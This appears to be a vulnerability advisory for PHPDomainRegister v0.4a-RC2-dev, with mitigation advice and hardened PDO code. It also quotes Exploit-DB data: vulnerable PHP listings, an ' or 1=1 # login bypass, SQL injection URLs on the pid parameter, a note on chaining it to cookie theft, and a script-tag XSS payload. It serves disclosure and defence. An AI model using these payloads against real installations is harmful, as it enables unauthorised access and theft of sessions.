Vendor: PHPDomainRegister
Author: Or4nG.M4n
CVSS: 7.5 (HIGH)
Vulnerability types: SQL Auth Bypass, SQL Injection
CWE: 89, 79
Product Name: PHPDomainRegister
Affected Version From: v0.4a-RC2-dev
Affected Version To: v0.4a-RC2-dev
Patch Exists: Unknown
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unknown

PHPDomainRegister v0.4a-RC2-dev => [SQL Auth][SQL Inject][XSS]

PHPDomainRegister v0.4a-RC2-dev contains an authentication bypass in class_AjaxLogin.php, line 73. The function is_login() (marker 1 in the listing below) includes config.php (marker 2), then copies the POST username parameter into the username session variable before any check has been made (markers 3 and 4) and concatenates that value, unescaped, into the login SELECT statement (marker 7). Because the username is never sanitized, an attacker can bypass authentication by submitting ' or 1=1 # as the username. Additionally, index.php, line 617, contains a SQL injection vulnerability: the value of the GET pid parameter is concatenated into a SQL query (marker 1 of that listing) without being sanitized, which allows arbitrary SQL to be injected into the query. The same unsanitized pid is used in admin/index.php, line 212, and the domain parameter of admin/index.php is reflected without output encoding (cross-site scripting).

Mitigation:

Use parameterized queries (prepared statements) for the login query and the package lookups, and validate pid as an integer before it reaches the query, so that user input can never change the structure of the SQL statement. Authentication should verify the password against a properly stored password hash in application code (the current code compares md5() of the password inside the SQL statement) and should set the session username only after the check has succeeded.
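A hardened form of the two query patterns quoted in the Exploit-DB data below, written here as an added example and not taken from the PHPDomainRegister code base; it assumes an open PDO connection in $pdo, an already started session, and the config.php table names passed in as parameters:

```php
<?php
// Added example (not PHPDomainRegister code): hardened replacements for the
// two query patterns quoted in the advisory. Assumes an open PDO connection
// in $pdo with PDO::ERRMODE_EXCEPTION, session_start() already called, and
// the $_SQL_PREFIX / $USER_Table_Name values from config.php passed in.

function is_login(PDO $pdo, string $prefix, string $userTable): bool
{
    if (!isset($_POST['username'], $_POST['password'])) {
        return false;
    }
    // Table names cannot be bound as parameters, so whitelist their characters.
    $table = $prefix . $userTable;
    if (!preg_match('/^[A-Za-z0-9_]+$/', $table)) {
        throw new RuntimeException('unexpected user table name');
    }
    // The username is bound as data: quotes and "#" in it can no longer
    // alter the WHERE clause the way ' or 1=1 # does in the original.
    $stmt = $pdo->prepare(
        "SELECT `LOGIN_NAME`, `password` FROM `$table` WHERE `LOGIN_NAME` = :name LIMIT 1"
    );
    $stmt->execute([':name' => $_POST['username']]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // This version of the application stores md5(password); compare the hash
    // in PHP with a constant-time check. password_hash()/password_verify() is
    // the long-term replacement for the md5 column.
    if ($row === false || !hash_equals((string) $row['password'], md5($_POST['password']))) {
        return false;
    }
    // Set the session only after a successful check, on a fresh session id.
    session_regenerate_id(true);
    $_SESSION['username'] = $row['LOGIN_NAME'];
    return true;
}

// Replacement for the index.php / admin/index.php package lookups: pid must be
// an integer before it is bound, so "pid=%injectionhere%" is rejected outright.
function fetch_package(PDO $pdo, string $prefix, $pid): ?array
{
    $id = filter_var($pid, FILTER_VALIDATE_INT);
    if ($id === false || $id < 1) {
        return null;
    }
    $stmt = $pdo->prepare("SELECT * FROM `{$prefix}packages` WHERE `id` = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}
```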

Exploit-DB raw data:

Title    = PHPDomainRegister v0.4a-RC2-dev => [SQL Auth][SQL Inject][XSS]
Author   = Or4nG.M4n
Download = http://garr.dl.sourceforge.net/project/phpdr/v0.4b%20-%20RC2.rar

This Bug Powered By : GooGLe
Thanks:
+----------------------------------+
|   xSs m4n i-Hmx Cyber-Crystal    |
|   Dr.Bnned ahwak2000 sa^Dev!L    |
+----------------------------------+

SQL Auth Bypass
vuln: class_AjaxLogin.php line 73

  function is_login() {                                              <<<<==== 1
      include ('../config.php');                                     <<<<==== 2
      if(isset($_POST['username'])) {                                <<<<==== 3
          $_SESSION['username'] = $_POST['username'];                <<<<==== 4
          $password = $_POST['password'];                            <<<<==== 5
          $strSQL   =                                                <<<<==== 6
              "SELECT *
               FROM `".$_SQL_PREFIX . $USER_Table_Name."`
               WHERE `LOGIN_NAME` = '".$_SESSION['username']."'
               AND password = md5('".$password."');";                <<<<==== 7

          $result = mysql_query ($strSQL);                           <<<<==== 8
          $row    = mysql_fetch_row($result);                        <<<<==== 9
          $exist  = count($row);                                     <<<<==== 10
          if($exist >= 2) { $this->jscript_location(); }             <<<<==== 11

  [jscript_location]

  function jscript_location() {                                      <<<<==== 12
      $this->set_session();                                          <<<<==== 13
      echo "<script> $('#container').fadeOut();window.location.href='".SUCCESS_LOGIN_GOTO."'</script>"; <<<<==== 14

How to exploit this bug:
just log in as => admin ' or 1=1 #

SQL injection
vuln: admin/index.php line 212

$sql = "SELECT name, price, disc, disc2, webspace FROM ".$_SQL_PREFIX."packages WHERE `id` = ".$_GET['pid'].";"; <<<<==== 1
$getpack = mysql_query($sql);                                        <<<<==== 2

line 1079

showPacket($pid);                                                    <<<<==== 3

vuln: index.php line 617

$SQL = "SELECT * FROM ".$_SQL_PREFIX."packages where id = ".$_GET['pid'].""; <<<<==== 1
$result = mysql_query($SQL);                                         <<<<==== 2

Exploit here:
index.php?usetype=domainauswahl&pid=%injectionhere%&use=Details
admin/index.php?show=showPacket&pid=%injectionhere%   (SQL injection to XSS to obtain the cookie)


Cross Site Scripting [XSS]
admin/index.php?show=domains&do=delFirmadomains&domain=<script>alert(7);</script>